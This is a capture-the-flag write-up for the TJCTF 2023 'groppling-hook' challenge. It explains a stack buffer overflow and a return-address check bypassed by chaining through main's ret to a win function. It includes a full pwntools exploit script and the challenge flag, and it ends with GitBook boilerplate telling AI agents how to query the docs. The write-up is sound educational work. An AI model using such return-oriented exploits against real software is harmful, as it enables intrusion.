> For the complete documentation index, see [llms.txt](https://hyggehalcyon.gitbook.io/page/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hyggehalcyon.gitbook.io/page/ctfs/2023/tjctf/groppling-hook.md). # groppling-hook ## Problem

Description

Gropple to safety? `nc tjc.tf 31080`

## Solution

As the name suggest it most likely will be a ROP style challenge. Checksec reveals that the PIE and Canary protection is not found which will make our exploit easier. We're given a source code so let's check that out

One relevant function is this `pwnable` function, it tries to read a buffer of 56 bytes into a buffer size of 10, which a buffer overflow. We can calculate the offset by summing the size of buffer + 8 bytes of RBP which will give us 18 as our offset to overwrite the RIP to the `win` function. However there seem a check to our RIP that's being set. Lets decompile this in Ghidra to make it easier to read.

It seems it check the boundaries for the RIP, if those conditions are applied then it will call `laugh()` which will exit the program and ruin our ROP exploit. If we see our `win` address we notice that it will satisfy the condition and thus will exit instead of calling the `win` function.

To bypass this we chain our ROP instead return to straight to `win`, we can jump a ret address that doesn't satisfy the condition somewhere else and then ret to our `win`. Two ways of doing is using the `ret;` gadget found by `ropper`, or we can simply return to the return instruction available in `main` and override that return to our `win` function since both of them doesn't satisfy any of the condition to call `laugh`

In the end I decided to utilise the return instruction in `main` to chain the ROP payload. {% code title="exploit.py" lineNumbers="true" fullWidth="false" %} ```python #!usr/bin/python3 from pwn import * # ========================================================= # SETUP # ========================================================= exe = './out' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'debug' host = 'tjc.tf' port = 31080 def start(argv=[], *a, **kw): if args.GDB: # Set GDBscript below return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) elif args.REMOTE: # ('server', 'port') return remote(host, port, *a, **kw) else: # Run locally return process([exe] + argv, *a, **kw) gdbscript = ''' init-pwndbg break *main '''.format(**locals()) io = start() # ========================================================= # ADDRESSES # ========================================================= # Got manually through cyclic gdb-pwndbg offset = 18 # (0x401263 > unaff_retaddr > 0x40128a) main_ret = 0x40128a win = 0x4011b3 # ========================================================= # EXPLOITS # ========================================================= payload = flat({ offset: [ main_ret, win ] }) io.sendlineafter(b'> ', payload) io.interactive() ``` {% endcode %} ## Flag > ***tjctf{this\_i#-my-questsss}*** --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hyggehalcyon.gitbook.io/page/ctfs/2023/tjctf/groppling-hook.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.